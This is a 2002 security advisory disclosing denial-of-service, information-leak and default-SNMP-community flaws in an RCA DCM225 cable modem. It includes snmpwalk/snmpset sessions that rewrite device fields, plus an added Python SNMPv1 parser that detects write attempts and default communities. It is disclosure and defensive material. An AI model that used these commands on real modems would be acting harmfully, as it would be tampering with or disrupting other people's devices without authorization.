[NEWS] RCA Cable Modem Contains Multiple Vulnerabilities

From: support@securiteam.com
Date: 03/28/02


From: support@securiteam.com
To: list@securiteam.com
Date: Thu, 28 Mar 2002 13:07:30 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  RCA Cable Modem Contains Multiple Vulnerabilities
------------------------------------------------------------------------

SUMMARY

The RCA Digital Cable Modem serves as a two-way high-speed bridge between
your personal computer and a cable Internet Service Provider (ISP). It
converts information that originates from the Internet or your computer
into electronic messages that can be transported over the same wires your
cable company uses to transport video signals. Multiple security
vulnerabilities have been found in the product that range from causing a
denial of service attack against it, to sensitive information leakage.

DETAILS

Denial of Service:
The RCA cable modem exposes two IP interfaces: one facing the local
(customer) side at 192.168.100.1, and one in the 10.x.x.x range facing the
remote (provider) side. Connecting to the listening TCP port 80 on the
second interface (10.x.x.x) causes the RCA cable modem to reset the user's
connection to the Internet.

Information Leakage:
It is possible to connect to any modem residing on the WAN side (all modems
located at the same node share the 10.x.x.x IP range) and view that user's
cable modem status information. The information shown there reveals details
such as:

        USB: Inactive
        Ethernet: 100BaseT
        MAC Address: 00 10 95 0a 05 62
        User: Active
        Signal Acquired at 573 MHz
        SNR: 36.0 dB
        Received Signal Strength: -4.0 dBmV
        Micro-Reflections: 20 dBc
        Connection: Acquired
        Frequency: 37 MHz
        Power Level: 44.0 dBmV
        Channel ID: 4
        Number of user conected: 1

Further information can be gathered by dumping the user's cable modem SNMP
data:

69.1.4.2.0 = IpAddress: 10.20.250.1
69.1.4.3.0 = IpAddress: 10.20.250.1
69.1.4.4.0 = IpAddress: 10.20.250.1
69.1.4.5.0 = "docsis_light_avalos"

These are entries of the docsDevServer group of the DOCSIS cable device MIB
(mib-2.69): the DHCP, time and TFTP server addresses and the name of the
DOCSIS configuration file. The word "avalos" in the file name is the name
of the street where the node facility is located.

Mis-configuration allows configuration of the device:
By accessing the device via SNMP with the commonly known default community
strings (read community "public", write community "public"), it is possible
to both read and write information stored on the device.

[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS:
PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (141857) 0:23:38.57
system.sysContact.0 = unassigned sysContact
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 79

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysName.0 s lame
system.sysName.0 = lame

[gabi@pluto gabi]$ snmpset 192.168.100.1 public system.sysLocation.0 s
lame_cyty
system.sysName.0 = lame_city

[gabi@pluto gabi]$ snmpwalk 192.168.100.1 public

system.sysDescr.0 = RCA DCM225 Cable Modem serial no. 65731049496572,
HW_Version 025 (03.1), SW_Version ST05.14.00, Bootloader_Ver 11.1, OS:
PSOS 2.5.0
system.sysObjectID.0 = OID: enterprises.2863.225.25.5.20.0
system.sysUpTime.0 = Timeticks: (161396) 0:26:53.96
system.sysContact.0 = unassigned sysContact
system.sysName.0 = lame
system.sysLocation.0 = lame_city
system.sysServices.0 = 79
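As an added example (not part of the advisory and not the modem's own software): a minimal SNMPv1 decoder in Python that recovers the community string, PDU type and OIDs from a captured datagram and flags SetRequests and default communities, which is the check an operator could run over SNMP traffic reaching a modem from the 10.x.x.x node network. The sample datagrams are constructed by the small BER encoder in the block to mirror the snmpset and snmpwalk commands above; the OIDs are the standard system group (1.3.6.1.2.1.1), and no real device is contacted.

```python
"""Flag SNMPv1 write attempts and default communities in captured datagrams.

Constructed example: a tiny BER encoder builds sample SNMPv1 messages and a
matching decoder extracts what a detection rule needs (community, PDU type,
OIDs). Nothing here talks to the network.
"""

PDU_NAMES = {0xA0: "GetRequest", 0xA1: "GetNextRequest", 0xA2: "GetResponse",
             0xA3: "SetRequest", 0xA4: "Trap"}
DEFAULT_COMMUNITIES = {"public", "private"}  # the strings the advisory abuses


def _ber_len(n):
    """BER definite-length form (short form below 128, long form above)."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + _ber_len(len(body)) + body


def encode_int(v):
    return tlv(0x02, v.to_bytes(max(1, (v.bit_length() + 8) // 8), "big", signed=True))


def encode_oid(dotted):
    """Dotted OID -> BER OBJECT IDENTIFIER (first two arcs packed as 40*a+b)."""
    arcs = [int(a) for a in dotted.split(".")]
    out = bytearray([arcs[0] * 40 + arcs[1]])
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:                      # base-128 with continuation bits
            chunk.append(0x80 | (a & 0x7F))
            a >>= 7
        out += bytes(reversed(chunk))
    return tlv(0x06, bytes(out))


def build_message(community, pdu_tag, varbinds, request_id=1):
    """SNMPv1 message: SEQUENCE { version(0), community, PDU }."""
    vbl = b"".join(tlv(0x30, encode_oid(oid) + val) for oid, val in varbinds)
    pdu = encode_int(request_id) + encode_int(0) + encode_int(0) + tlv(0x30, vbl)
    return tlv(0x30, encode_int(0) + tlv(0x04, community.encode()) + tlv(pdu_tag, pdu))


def _read_tlv(buf, pos):
    """Return (tag, body, position after the element)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def decode_oid(body):
    arcs, val = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        val = (val << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(val)
            val = 0
    return ".".join(map(str, arcs))


def parse_snmpv1(datagram):
    """Extract version, community, PDU type and the OIDs in the varbind list."""
    tag, msg, _ = _read_tlv(datagram, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    _, ver, pos = _read_tlv(msg, 0)
    _, comm, pos = _read_tlv(msg, pos)
    pdu_tag, pdu, _ = _read_tlv(msg, pos)
    _, _, p = _read_tlv(pdu, 0)       # request-id
    _, _, p = _read_tlv(pdu, p)       # error-status
    _, _, p = _read_tlv(pdu, p)       # error-index
    _, vbl, _ = _read_tlv(pdu, p)     # SEQUENCE OF VarBind
    oids, q = [], 0
    while q < len(vbl):
        _, vb, q = _read_tlv(vbl, q)
        _, oid_body, _ = _read_tlv(vb, 0)
        oids.append(decode_oid(oid_body))
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": comm.decode("ascii", "replace"),
            "pdu": PDU_NAMES.get(pdu_tag, hex(pdu_tag)), "oids": oids}


def classify(datagram):
    """Detection rule: any SetRequest, or any use of a default community."""
    m = parse_snmpv1(datagram)
    findings = []
    if m["pdu"] == "SetRequest":
        findings.append("write attempt")
    if m["community"] in DEFAULT_COMMUNITIES:
        findings.append("default community")
    return m, findings


# Constructed samples mirroring the advisory's snmpset/snmpwalk against sysName/sysDescr.
SET_SYSNAME = build_message("public", 0xA3, [("1.3.6.1.2.1.1.5.0", tlv(0x04, b"lame"))])
GET_SYSDESCR = build_message("k9$Xq-site", 0xA0, [("1.3.6.1.2.1.1.1.0", tlv(0x05, b""))])

if __name__ == "__main__":
    for pkt in (SET_SYSNAME, GET_SYSDESCR):
        meta, findings = classify(pkt)
        print(meta["pdu"], meta["community"], meta["oids"], findings or "ok")
```

Run on real traffic, feed each UDP/161 payload to classify() and alert when findings is non-empty from any source other than the provider's management hosts; the same parse also tells you which OIDs were touched, so a sysName or sysLocation write like the one in the advisory stands out immediately.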

ADDITIONAL INFORMATION

The information has been provided by Gabriel A. Maggiotti
<gmaggiot@ciudad.com.ar>.
